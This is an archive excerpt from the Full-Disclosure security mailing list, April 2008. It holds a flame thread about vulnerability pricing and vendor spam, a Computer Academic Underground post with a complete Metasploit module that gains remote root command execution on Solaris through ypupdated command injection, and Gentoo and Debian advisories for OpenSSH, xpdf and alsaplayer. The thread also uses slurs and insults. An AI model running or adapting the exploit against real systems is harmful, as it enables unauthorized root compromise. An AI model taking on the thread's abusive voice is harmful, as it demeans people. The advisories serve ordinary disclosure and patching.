Those on the list who don't disclose a vulnerability *but* are trying
to sell a product should be outlawed.

^^^^do you know the difference between disclosure and profiteering?

You're losing my rag and the lack of intellectual debate on this from
non-retards is shocking, these are two serious topics that need
debating and all i've got is some lamer called "Ureleet" trying to
wind me up.

Is anyone who can have a serious debate on this list?

n3td3v



From razishaban at gmail.com  Fri Apr  4 23:19:50 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Sat, 5 Apr 2008 01:19:50 +0300
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804041511i32365f33g3dcdc9ef34a02e5c@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
	<4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
	<6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com>
	<4b6ee9310804041511i32365f33g3dcdc9ef34a02e5c@mail.gmail.com>
Message-ID: <2d792fb20804041519q2f9bea81j9304ae9446414a03@mail.gmail.com>

You say "serious debate" as if you are attempting to partake in such a
debate. You are not. You are flaming.

Now, please stop flaming.
Note for fairness: This is not intended exclusively for netdev, but
for everyone who is flaming.


--
Razi

On 4/5/08, n3td3v <xploitable at gmail.com> wrote:
> On Fri, Apr 4, 2008 at 9:34 PM, Ureleet <ureleet at gmail.com> wrote:
>  > see:
>  >
>  > > - Come to our conference - profit... buy our ticket, get a macbook prize.
>  >
>  > > - Hacking challenge prize - profit... they give you $5000 and sell it
>  > > to the vendor for a lot more.
>  >
>  > ZDI provides the money for this.  and they don't sell it back to vendor
>  >
>  >
>  > > - Train to use our software -profit... over priced training for
>  > > software... not interested.
>  >
>  > dont' get angry at remote-exploit because they are making money from their
>  > work .  how much money do you make from posting to fd?
>  >
>  >
>  > > On the issue of how much a vulnerability is worth, the prices are not
>  > > regulated, we need regulation into how much a vulnerability costs,
>  > > because the prices right now are wild. We need to take vulnerability
>  > > pricing off the blackmarket and onto a legitimate central website for
>  > > selling vulnerabilities, or cash rewards for disclosing a
>  > > vulnerability to a particular company or organisation.
>  >
>  > wabisabilabi?  zdi...  etc.
>  >
>  > > Can someone post to full-disclosure a price list of what they think a
>  > > bufferoverflow should be worth etc, and we can vote if we agree.
>  >
>  > feel free to take that as a todo item.  however, i would think it would
>  > depend on the bo.
>  >
>  > > We can't dress up cash prizes/contests as something else as well, if a
>  > > website is offering a $5,000 reward for a vulnerability, we need to
>  > > know if we're being ripped off with the cash reward and how much can
>  > > be potentially made after its sold on.
>  >
>  > zdi doesn't sell their exploits afaik.
>  >
>  >
>  > > Robert Lemos even http://www.securityfocus.com/news/11510 talked about
>  > > vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
>  > > reward might not be enough money, compared to what a vulnerability
>  > > *should* be worth, and taking into consideration how much profit
>  > > CanSecWest make overall from people attending the conference.
>  >
>  > the pwn2own cash is supplied by zdi.  that's what you arent' realizing.
>  >
>  >
>  > > So you take into consideration how much a vulnerability should be
>  > > worth, then the added worth because its a security conference of how
>  > > much should be added on to counter the profit being made by the event.
>  >
>  > you already said this. twice.
>  >
>  >
>  > > However, to round off, we can't allow the mailing lists to turn into a
>  > > vulnerability market place, full-disclosure should be for free stuff,
>  > > and other websites and mailing lists can be setup for *money making
>  > > schemes and auctions*.
>  >
>  > there are.  however how are the people going to know about the websites if
>  > you don't allow people to 'spam' lists with this sort of thing, mr
>  > unofficial-fd moderator?
>  >
>  >
>  > > We shouldn't allow the money makers directly to market X... if a link
>  > > is put on Full-Disclosure by a member of the public on the fly then
>  > > thats ok, but I think its cheeky for the particular conference,
>  > > contest runner or software trainer to be on the list themselves
>  > > spamming everyone, for a profiteering agenda.
>  >
>  > that's why its called free enterprise, it's an unmoderated list.  feel free
>  > to unsubscribe if you dont like it much..
>  >
>  >
>  > > You mention cross-posting, thats not the issue here, its the people
>  > > making the money posting to make the money that offends me so much.
>  >
>  > we know, its the third time youve said it in one email.
>  >
>  >
>  > > And not even the lonely hacker offends me who posts i've got a
>  > > vulnerability for sale for X, I don't mind that on Full-Disclosure,
>  > > but what I do mind is if its a company or organisation doing it that
>  > > is directly the ones making the money via vulnerability for sale,
>  > > prize contest, security conference or train to use our software!!!,
>  > > thats the height of spam I just think is utterly wrong and unethical
>  > > on any scale of acceptability.
>  >
>  > again, free market, and you are directly talking about zdi.
>  >
>  >
>  > > If a lonley hacker who works in a supermarket has a vulnerabilty to
>  > > sell i'm all for it being post on full-disclosure, but not the big
>  > > money conferences, prize hacking contests and software training guys.
>  >
>  > fourth time.
>  >
>  >
>  > > I come under the bracket as supermarket worker with nothing much going
>  > > for me in life, so I should be allowed to sell a vulnerability on
>  > > what's ment to be a mailing list for non-profit disclosure.
>  >
>  > you work at a supermarket?  so you know about the under cash drawer switch
>  > that pops open the drawer exploit?
>  >
>  >
>  >
>  > > You will find it easy to shout me down and say n3td3v's an idiot, but
>  > > wait to the vulnerability market really takes off and the prices of
>  > > vulnerabilities are properly defined and regulated, you're going to
>  > > see a huge increase in commercial spam on the mailing lists, like the
>  > > full-disclosure mailing list. so we've got to define what's fair play
>  > > e-mail and what's a company or organisation blatantly profiteering
>  > > with X method of extracting money out of people and using skilled
>  > > hackers to make money, and to promote a security conference, training
>  > > etc.
>  >
>  > again, unmoderated list.  the door is over there.
>
>
> * i * * never * mentioned * ZDI * you * complete * jerk * off *
>
>  * read * * the * * e-mail * properly * and * you * will * understand *
>  what * I * don't * like *
>
>  Overview:
>
>  FIRST
>
>  I said let's have a debate about how much a vulnerability is worth per
>  vulnerability type, so everyone knows if we're being ripped off by joe
>  jobs and to stop any blackmarkets, prices needs to be defined and
>  regulated, so everyone knows where they stand in the security
>  community as far as prices are concerned.
>
>  ^^^^You bypassed this completely.
>
>  SECOND
>
>  Those on the list who don't disclose a vulnerability *but* are trying
>  to sell a product should be outlawed.
>
>  ^^^^do you know the difference between disclosure and profiteering?
>
>  You're losing my rag and the lack of intellectual debate on this from
>  non-retards is shocking, these are two serious topics that need
>  debating and all i've got is some lamer called "Ureleet" trying to
>  wind me up.
>
>  Is anyone who can have a serious debate on this list?
>
>
>  n3td3v
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From druid at caughq.org  Sat Apr  5 02:39:37 2008
From: druid at caughq.org (I)ruid)
Date: Fri, 04 Apr 2008 20:39:37 -0500
Subject: [Full-disclosure] CAU-EX-2008-0001: Solaris ypupdated Command
	Execution
Message-ID: <1207359577.3155.29.camel@localhost>

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0001
Release Date:   2008.04.04
Title:          ypupdated_exec.rb
Description:    Solaris ypupdated Command Execution
Tested:         Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes:     Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email:   I)ruid <druid (@) caughq.org>
===============/========================================================

Description
===========

This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request.  Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format '|<command>'.


Credits
=======

Josh D. <mcpheea at cadvision.com> from Avalon Security Research is
credited with originally discovering this vulnerability.

This Metasploit exploit module was modeled after kcope's exploit
released to Milw0rm on 2008.03.20.


References
==========

http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
http://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282


Metasploit
==========

require 'msf/core'

module Msf

class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote

	include Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris ypupdated Command Execution',
			'Description'    => %q{
				This exploit targets a weakness in the way the ypupdated RPC
				application uses the command shell when handling a MAP UPDATE
				request.  Extra commands may be launched through this command
				shell, which runs as root on the remote host, by passing
				commands in the format '|<command>'.

				Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
				ypupdated is started with the '-i' command-line option.
			},
			'Author'         => [ 'I)ruid <druid at caughq.org>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4498 $',
			'References'     =>
				[
					['BID', '1749'],
					['CVE', '1999-0209'],
					['OSVDB', '11517'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 1024,
					'DisableNops' => true,
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		hostname  = datastore['HOSTNAME']
		program   = 100028
		progver   = 1
		procedure = 1

		print_status 'Sending PortMap request for ypupdated program'
		pport = sunrpc_create('udp', program, progver)

		print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
		print_status 'Waiting for response...'
		sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
		command = '|' + payload.encoded
		msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
		sunrpc_call(procedure, msg)

		sunrpc_destroy

		print_good 'No Errors, appears to have succeeded!'
	rescue ::Rex::Proto::SunRPC::RPCTimeout
		print_status 'Warning: ' + $!
		print_status 'Exploit may or may not have succeeded.'
	end

end
end	


-- 
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: ypupdated_exec.rb
Type: application/x-ruby
Size: 2199 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/3543ef27/attachment.bin 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/3543ef27/attachment-0001.bin 

From rbu at gentoo.org  Sat Apr  5 13:53:20 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Sat, 5 Apr 2008 14:53:20 +0200
Subject: [Full-disclosure] [ GLSA 200804-03 ] OpenSSH: Privilege escalation
Message-ID: <200804051453.20737.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200804-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenSSH: Privilege escalation
      Date: April 05, 2008
      Bugs: #214985, #215702
        ID: 200804-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two flaws have been discovered in OpenSSH which could allow local
attackers to escalate their privileges.

Background
==========

OpenSSH is a complete SSH protocol implementation that includes an SFTP
client and server support.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /   Vulnerable   /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/openssh      < 4.7_p1-r6                    >= 4.7_p1-r6

Description
===========

Two issues have been discovered in OpenSSH:

* Timo Juhani Lindfors discovered that OpenSSH sets the DISPLAY
  variable in SSH sessions using X11 forwarding even when it cannot
  bind the X11 server to a local port in all address families
  (CVE-2008-1483).

* OpenSSH will execute the contents of the ".ssh/rc" file even when
  the "ForceCommand" directive is enabled in the global sshd_config
  (CVE-2008-1657).

Impact
======

A local attacker could exploit the first vulnerability to hijack
forwarded X11 sessions of other users and possibly execute code with
their privileges, disclose sensitive data or cause a Denial of Service,
by binding a local X11 server to a port using only one address family.
The second vulnerability might allow local attackers to bypass intended
security restrictions and execute commands other than those specified
by "ForceCommand" if they are able to write to their home directory.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenSSH users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/openssh-4.7_p1-r6"

References
==========

  [ 1 ] CVE-2008-1483
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1483
  [ 2 ] CVE-2008-1657
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1657

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080405/48bf181b/attachment.bin 

From devin at debian.org  Wed Apr  2 22:25:32 2008
From: devin at debian.org (Devin Carraway)
Date: Wed, 02 Apr 2008 23:25:32 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1537-1] New xpdf packages fix
	multiple vulnerabilities
Message-ID: <E1JhASa-0004DS-6D@klecker.debian.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1537-1                security at debian.org
http://www.debian.org/security/                         Devin Carraway
April 02, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xpdf
Vulnerability  : multiple
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-4352 CVE-2007-5392 CVE-2007-5393

Alin Rad Pop (Secunia) discovered a number of vulnerabilities in xpdf, a set
of tools for display and conversion of Portable Document Format (PDF) files.
The Common Vulnerabilities and Exposures project identifies the following
three problems:

CVE-2007-4352

    Inadequate DCT stream validation allows an attacker to corrupt
    memory and potentially execute arbitrary code by supplying a
    maliciously crafted PDF file.

CVE-2007-5392

    An integer overflow vulnerability in DCT stream handling could
    allow an attacker to overflow a heap buffer, enabling the execution
    of arbitrary code.

CVE-2007-5393

    A buffer overflow vulnerability in xpdf's CCITT image compression
    handlers allows overflow on the heap, allowing an attacker to
    execute arbitrary code by supplying a maliciously crafted
    CCITTFaxDecode filter.

For the stable distribution (etch), these problems have been fixed in
version 3.01-9.1+etch2.

For the unstable distribution (sid), these problems have been fixed in
version 3.02-1.3.

We recommend that you upgrade your xpdf packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch2.diff.gz
    Size/MD5 checksum:    38819 aab7a1116e3267fad270dda3c77d79ea
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch2.dsc
    Size/MD5 checksum:      974 e67bcc829b980bc91168137c5f7c8ff0
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01.orig.tar.gz
    Size/MD5 checksum:   599778 e004c69c7dddef165d768b1362b44268

Architecture independent packages:

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-common_3.01-9.1+etch2_all.deb
    Size/MD5 checksum:    61314 e5390719b5e1ccf8d7693a62ec34acfd
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch2_all.deb
    Size/MD5 checksum:     1280 b45afbdf7fb24ada4e657dba2a8c8243

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_amd64.deb
    Size/MD5 checksum:  1456842 fb1b065bf8436387895bcd70327a531a
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_amd64.deb
    Size/MD5 checksum:   795110 e72df10c4736d9ea929118a7a70dfff3

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_arm.deb
    Size/MD5 checksum:   788592 8ae5bca1f64769399171301753168f16
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_arm.deb
    Size/MD5 checksum:  1432474 932ab72d7c80440db8cc315f5c8d15db

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_hppa.deb
    Size/MD5 checksum:  1742282 3da481ccb549c8f8b0e9ccc623c25483
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_hppa.deb
    Size/MD5 checksum:   949772 075197f762e662652adafef93707b52a

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_i386.deb
    Size/MD5 checksum:   783020 a6ddad14ae3173c88b753612060b2b07
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_i386.deb
    Size/MD5 checksum:  1426268 5e84d679b7123dfd002cea841d283979

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_ia64.deb
    Size/MD5 checksum:  1197338 43efabc7f076e9c9d9e0bfec5195ea9b
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_ia64.deb
    Size/MD5 checksum:  2168060 5472b44baa87bae8e1401ba27793f102

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_mips.deb
    Size/MD5 checksum:  1709020 48e6faeb10a55716dd7a0e1063d8a983
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_mips.deb
    Size/MD5 checksum:   944706 9ef45fa29e6b793ffd6ddb4300299d87

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_mipsel.deb
    Size/MD5 checksum:   932510 c737ff8bd1d841f6d35b3d4c89de7e43
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_mipsel.deb
    Size/MD5 checksum:  1688522 5f9636000a58a2e0935686aa33c51974

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_powerpc.deb
    Size/MD5 checksum:  1522230 ef3d27bfb0bd744eb87ade8a4f7d55a6
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_powerpc.deb
    Size/MD5 checksum:   834210 a0293d2c13cce4de9f483e678d344581

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_s390.deb
    Size/MD5 checksum:  1365510 df6cb0028e22f051dabf649f11b7987d
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_s390.deb
    Size/MD5 checksum:   753070 b4fffe635d26e9951bc772f4ee9e44a2

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch2_sparc.deb
    Size/MD5 checksum:   750702 b327ef2ff5e022b473b5d9865adcc27a
  http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch2_sparc.deb
    Size/MD5 checksum:  1364114 d1bab9a2a555a26090a22a1c533abd9f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFH8/lbYrVLjBFATsMRAiAuAJ9GagOaLXQDHgT7kceFBZGweaJc0wCeOJ8o
mqdpoPu+W2jmYjwv9WqQkhg=
=3qKp
-----END PGP SIGNATURE-----



From devin at debian.org  Fri Apr  4 21:27:22 2008
From: devin at debian.org (Devin Carraway)
Date: Fri,  4 Apr 2008 22:27:22 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1538-1] New alsaplayer packages
	fix arbitrary code execution
Message-ID: <20080404202722.407F7326A99@morgana.loeki.tv>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1538-1                  security at debian.org
http://www.debian.org/security/                           Devin Carraway
April 04, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : alsaplayer
Vulnerability  : buffer overrun
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-5301
Debian Bug     : 446034

Erik Sj??lund discovered a buffer overflow vulnerability in the Ogg
Vorbis input plugin of the alsaplayer audio playback application.
Successful exploitation of this vulnerability through the opening of a
maliciously-crafted Vorbis file could lead to the execution of
arbitrary code.

For the stable distribution (etch), the problem has been fixed in
version 0.99.76-9+etch1.

For the unstable distribution (sid), the problem was fixed in version
0.99.80~rc4-1.

We recommend that you upgrade your alsaplayer packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer_0.99.76-9+etch1.dsc
    Size/MD5 checksum:     1411 f1cef8ce08af0bc84cc18f45bf54774b
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer_0.99.76-9+etch1.diff.gz
    Size/MD5 checksum:   179628 f2af0197803ce618482ecdc6c78b420e

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    27560 e1b68d62513e27add20da78f6820b1f4
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    28082 c66cc4df7b809c81df49de084b462205
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    27270 6f75fda99af97920257383affe3c075f
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    30272 46817a06719f8becbeb69b9359d4d91a
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    25590 bb7c7149b6757eceb15357472bb4e2b6
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:   195438 440ce88bb7f9a2d5b2a3e4bc0c35657b
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    25420 4bc13bef3dab2646be6750fdd296358d
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    27608 483288f19e1fe342240162cfa150a02d
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:   137782 0b52ae9bc30a1314834e7ef5107f3659
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    31896 6f1227ba21196977efc12f41dfb30c0a
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    83198 edb8f259c9817a975f0d87f99108697f
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_alpha.deb
    Size/MD5 checksum:    28586 1af7443e262e60c7a38380124c2b488b

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    26924 a35d711c0e01c370415d59549b8a5f23
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:   121774 4e04fcd7739a1905e48ba49fda0a807b
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:   163868 8bef80d9dc227726d2f2024549265bd9
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    25192 7157a8d0c576f791154d85d305d5ee4e
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    28990 20a25a4f3fbb7635fc92f4bd3db34123
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    27816 3e7b0fd06c61fb07636e9a8ad4223925
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    27596 a030d22d8d0a04f5c944e4f1acd95ad0
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    26884 4e2f9a0a5570680075d8e723ded3af4d
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    27050 f1e36292510e1c6800381c1687de72f2
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    31348 e2e95c3d77565abcb77fc3016ac94318
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    82202 47f4dd3eac22823b20eac1d5ac2a593c
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_amd64.deb
    Size/MD5 checksum:    25118 ddea153c747bbac0286b2fe9708da9b4

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    27736 86b887e84550c7288c773fc8a888dfb7
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    26672 1dc88ad32d415f5a2c6624b69e7998ca
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    27216 736ce1ccaafae5f9e3625dbdf8b5899d
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:   120772 4aefd3462f4256965914286c1a7061e8
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    83954 48d8e598299a15b90b61a920e141ed85
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    26752 f9de177fea822cbf3080d4edacc74db6
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    28656 05d55679345622f1a87ff2f1cca7e5bd
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    27358 dfa10d528760e3e9de65c20ea9d9dae6
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    25152 b1c6124426d3193df76eaf30d434c8bb
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:   173496 76c2bfe4990607494b9e6d39de7c394c
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_arm.deb
